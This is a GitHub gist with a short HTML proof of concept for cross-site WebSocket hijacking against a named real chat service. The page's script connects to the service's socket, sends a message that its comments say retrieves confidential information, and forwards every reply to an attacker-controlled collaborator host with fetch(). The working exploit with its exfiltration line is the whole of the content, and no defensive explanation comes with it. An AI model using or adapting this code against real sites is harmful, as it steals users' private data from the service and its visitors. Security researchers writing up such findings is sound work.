Skip to content

Instantly share code, notes, and snippets.

@istefy
Created September 8, 2021 17:18
Show Gist options
  • Save istefy/dee5c1c0df7371d55fd401b51f48fd56 to your computer and use it in GitHub Desktop.
Save istefy/dee5c1c0df7371d55fd401b51f48fd56 to your computer and use it in GitHub Desktop.
<html>
<script>
var ws = new WebSocket("wss://chat.domclick.ru/socket.io/?mode=multi&userAgent=websocket-client%40unknown%20%23unknown&EIO=3&transport=websocket");
ws.onopen = start
ws.onmessage = handleReply
function start(event) {
ws.send("READY"); //Send the message to retreive confidential information
}
function handleReply(event) {
//Exfiltrate the confidential information to attackers server
fetch('https://h7p1dq0wucucxse07nkhu7qn0e64ut.collab.vasya.xyz/?'+event.data, {mode: 'no-cors'})
}
</script>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment